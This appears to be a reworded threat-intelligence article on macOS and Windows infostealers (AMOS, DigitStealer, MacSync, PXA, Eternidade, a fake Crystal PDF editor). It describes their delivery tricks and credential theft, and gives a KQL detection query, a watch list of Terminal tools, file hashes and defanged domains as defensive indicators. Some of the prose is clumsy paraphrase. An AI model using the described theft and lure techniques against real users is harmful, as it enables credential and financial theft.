Infostealer malware is rapidly expanding beyond Windows and is currently severely affecting macOS This article explores malware eternidade stealer. . To steal credentials covertly, attackers utilize trusted apps and Python code.

Microsoft Defender Experts have been identifying macOS campaigns using fraudulent websites, ClickFix tricks, and malicious DMG files since late 2025. These drop stealers include Atomic macOS Stealer (AMOS), DigitStealer, and MacSync. The malware uses AppleScript to obtain browser data, keychains, and development secrets while operating without any files and tapping macOS tools. Attackers can quickly modify code for any OS with the aid of Python stealers.

Others use PDF and WhatsApp tools to spread malware, such as Eternidade Stealer, that targets cryptocurrency wallets and bank logins. Business breaches, account hacking, and financial loss are all caused by stolen information.

Python Phishing, App Abuse, and macOS Tricks Fake Google Ads and websites promoting malicious downloads or Terminal commands are encountered by Mac users. ClickFix scams require victims to paste code that installs AMOS (fake AI tools), MacSync (fake Terminal pastes), or DigitStealer (through phony DynamicLake apps). Before cleaning up, all three capture browser passwords, cryptocurrency wallets, cloud keys, and development tokens.

They then zip and send the data to attacker servers. In 2025, the number of Python thieves, such as PXA, increased due to Vietnamese actors using phishing to target governments. For C2, obfuscated scripts, DLL sideloading, and phony svchost.exe processes, they employ Telegram. Campaigns in October and December use tasks or run keys to establish persistence and use Telegram to exfil data.

WhatsApp is abused by attackers to spread like a worm.

PowerShell and VBS dropping batch files are the first steps in a November 2025 campaign. Eternidade Stealer is dropped via MSI, contacts are grabbed, and malicious messages are sent. This Delphi tool keeps an eye out for bank websites such as MetaMask, Binance, and Bradesco.

Malvertising was used in a September Crystal PDF scam. In addition to setting scheduled tasks, the fraudulent editor steals sessions and cookies from AppData for Chrome and Firefox. IOCs, Detections, and Mitigations By educating users about fraudulent installers and terminal hazards, these can be prevented. Keep an eye out for curl, base64, gunzip, and osascript in Terminal.

The flag ZIPs in /tmp, strange POSTs to new domains, and keychain access. For cloud protection, EDR block mode, network/web guards, SmartScreen, auto-remediation, and tamper protection, use Microsoft Defender XDR. Untrusted executables, JS/VBS downloads, and obfuscated scripts are blocked by attack surface rules.

Defender detects evasion (DLL side-loading, certutil), execution (PowerShell curls, osascript), persistence (Run keys, LaunchAgents), credential grabs, discovery (WMI/Python), C2, collection (ZIPs), and exfil (curl). Look for DigitStealer using the following queries: // Suspicious DMG mounting DeviceProcessEvents | where FileName has_any ('mount_hfs', 'mount') | where ProcessCommandLine has_all ('-o nodev', '-o quarantine') | where ProcessCommandLine contains '/Volumes/Install DynamicLake' Similar KQL is used for CrystalPDF tasks, AMOS mounts, PXA svchost.exe, WhatsApp VBS drops, and MacSync curls. Important IOCs (samples): Indicator Type Description 3e20ddb90291ac17cef9913edd5ba91cd95437da86e396757c9d871a82b1282a SHA-256 DigitStealer payload 42d51feea16eac568989ab73906bbfdd41641ee3752596393a875f85ecf06417 SHA-256 AMOS payload 2c885d1709e2ebfcaa81e998d199b29e982a7559b9d72e5db0e70bf31b183a5f SHA-256 WhatsApp campaign 598da788600747cf3fa1f25cb4fa1e029eca1442316709c137690e645a0872bb SHA-256 Crystal PDF payload dynamiclake[.

]org Domain DigitStealer delivery barbermoo[. ]coupons Domain MacSync C2 alli-ai[. ]pro Domain AMOS redirect bagumedios[. ]cloud Domain PXA C2 Check Threat Analytics for MacSync and Crystal PDF intel.

These cross-platform thieves blend in and get past outdated defenses, so organizations should scan now.